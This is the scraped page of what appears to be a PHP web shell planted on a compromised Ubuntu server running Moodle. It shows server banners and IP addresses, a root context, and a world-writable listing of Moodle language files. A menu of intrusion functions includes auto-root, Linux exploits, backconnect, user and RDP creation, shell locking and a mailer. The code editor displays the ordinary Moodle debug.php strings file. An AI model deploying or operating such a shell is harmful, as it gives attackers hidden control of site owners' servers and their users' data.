Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
fonts
[ DIR ]
drwxrwxrwx
access.php
1.73
KB
-rwxrwxrwx
admin.php
157.49
KB
-rwxrwxrwx
analytics.php
12.47
KB
-rwxrwxrwx
antivirus.php
1.46
KB
-rwxrwxrwx
auth.php
16.29
KB
-rwxrwxrwx
availability.php
3.52
KB
-rwxrwxrwx
backup.php
30.28
KB
-rwxrwxrwx
badges.php
43.83
KB
-rwxrwxrwx
block.php
5.37
KB
-rwxrwxrwx
blog.php
13.39
KB
-rwxrwxrwx
bulkusers.php
2.19
KB
-rwxrwxrwx
cache.php
13.36
KB
-rwxrwxrwx
calendar.php
15.87
KB
-rwxrwxrwx
cohort.php
5.3
KB
-rwxrwxrwx
comment.php
1.26
KB
-rwxrwxrwx
competency.php
13.53
KB
-rwxrwxrwx
completion.php
16.92
KB
-rwxrwxrwx
contentbank.php
4.08
KB
-rwxrwxrwx
countries.php
8.5
KB
-rwxrwxrwx
course.php
8.68
KB
-rwxrwxrwx
currencies.php
6.61
KB
-rwxrwxrwx
customfield.php
5.58
KB
-rwxrwxrwx
dbtransfer.php
1.91
KB
-rwxrwxrwx
debug.php
3.24
KB
-rwxrwxrwx
deprecated.txt
3.93
KB
-rwxrwxrwx
editor.php
6.74
KB
-rwxrwxrwx
edufields.php
23.01
KB
-rwxrwxrwx
enrol.php
10.59
KB
-rwxrwxrwx
error.php
49.46
KB
-rwxrwxrwx
favourites.php
1.67
KB
-rwxrwxrwx
fileconverter.php
1.1
KB
-rwxrwxrwx
files.php
2.04
KB
-rwxrwxrwx
filters.php
4.29
KB
-rwxrwxrwx
form.php
4.52
KB
-rwxrwxrwx
grades.php
64.27
KB
-rwxrwxrwx
grading.php
7.82
KB
-rwxrwxrwx
group.php
12.12
KB
-rwxrwxrwx
h5p.php
13.56
KB
-rwxrwxrwx
hub.php
17.65
KB
-rwxrwxrwx
imscc.php
2.13
KB
-rwxrwxrwx
install.php
19.24
KB
-rwxrwxrwx
iso6392.php
16.06
KB
-rwxrwxrwx
langconfig.php
2.45
KB
-rwxrwxrwx
license.php
1.8
KB
-rwxrwxrwx
mathslib.php
2.06
KB
-rwxrwxrwx
media.php
2.15
KB
-rwxrwxrwx
message.php
19.46
KB
-rwxrwxrwx
mimetypes.php
5.12
KB
-rwxrwxrwx
mnet.php
21.05
KB
-rwxrwxrwx
moodle.php
145.73
KB
-rwxrwxrwx
my.php
1.99
KB
-rwxrwxrwx
notes.php
3.76
KB
-rwxrwxrwx
pagetype.php
1.91
KB
-rwxrwxrwx
pix.php
1.6
KB
-rwxrwxrwx
plagiarism.php
1.52
KB
-rwxrwxrwx
plugin.php
17.68
KB
-rwxrwxrwx
portfolio.php
16.06
KB
-rwxrwxrwx
privacy.php
2.65
KB
-rwxrwxrwx
question.php
38.18
KB
-rwxrwxrwx
rating.php
3.67
KB
-rwxrwxrwx
repository.php
16.74
KB
-rwxrwxrwx
role.php
32.23
KB
-rwxrwxrwx
rss.php
1021
B
-rwxrwxrwx
search.php
7.83
KB
-rwxrwxrwx
table.php
1.13
KB
-rwxrwxrwx
tag.php
8.99
KB
-rwxrwxrwx
timezones.php
22.48
KB
-rwxrwxrwx
user.php
10.55
KB
-rwxrwxrwx
userkey.php
2.73
KB
-rwxrwxrwx
webservice.php
19.26
KB
-rwxrwxrwx
xapi.php
1006
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : debug.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Strings for component 'debug', language 'en', branch 'MOODLE_20_STABLE' * * @package core * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['authpluginnotfound'] = 'Authentication plugin {$a} not found.'; $string['blocknotexist'] = '{$a} block doesn\'t exist'; $string['cannotbenull'] = '{$a} cannot be null!'; $string['cannotdowngrade'] = 'Cannot downgrade {$a->plugin} from {$a->oldversion} to {$a->newversion}.'; $string['cannotfindadmin'] = 'Could not find an admin user!'; $string['cannotinitpage'] = 'Cannot fully initialize page: invalid {$a->name} id {$a->id}'; $string['cannotsetuptable'] = '{$a} tables could NOT be set up successfully!'; $string['codingerror'] = 'Coding error detected, it must be fixed by a programmer: {$a}'; $string['configmoodle'] = 'Moodle has not been configured yet. You need to edit config.php first.'; $string['debuginfo'] = 'Debug info'; $string['erroroccur'] = 'An error has occurred during this process'; $string['invalidarraysize'] = 'Incorrect size of arrays in params of {$a}'; $string['invalideventdata'] = 'Incorrect event data submitted: {$a}'; $string['invalidparameter'] = 'Invalid parameter value detected'; $string['invalidresponse'] = 'Invalid response value detected'; $string['line'] = 'Line'; $string['missingconfigversion'] = 'Config table does not contain the version. You cannot continue.'; $string['modulenotexist'] = '{$a} module doesn\'t exist'; $string['morethanonerecordinfetch'] = 'Found more than one record in fetch() !'; $string['mustbeoveride'] = 'Abstract {$a} method must be overridden.'; $string['noadminrole'] = 'No admin role could be found'; $string['noblocks'] = 'No blocks installed!'; $string['nocate'] = 'No categories!'; $string['nomodules'] = 'No modules found!!'; $string['nopageclass'] = 'Imported {$a} but found no page classes'; $string['noreports'] = 'No reports accessible'; $string['notables'] = 'No tables!'; $string['outputbuffer'] = 'Output buffer'; $string['phpvaroff'] = 'The PHP server variable \'{$a->name}\' should be Off - {$a->link}'; $string['phpvaron'] = 'The PHP server variable \'{$a->name}\' is not turned On - {$a->link}'; $string['sessionmissing'] = '{$a} object missing from session'; $string['sqlrelyonobsoletetable'] = 'This SQL relies on obsolete table(s): {$a}! Your code must be fixed by a developer.'; $string['stacktrace'] = 'Stack trace'; $string['withoutversion'] = 'Main version.php file is missing, not readable or broken.'; $string['xmlizeunavailable'] = 'xmlize functions are not available';
Close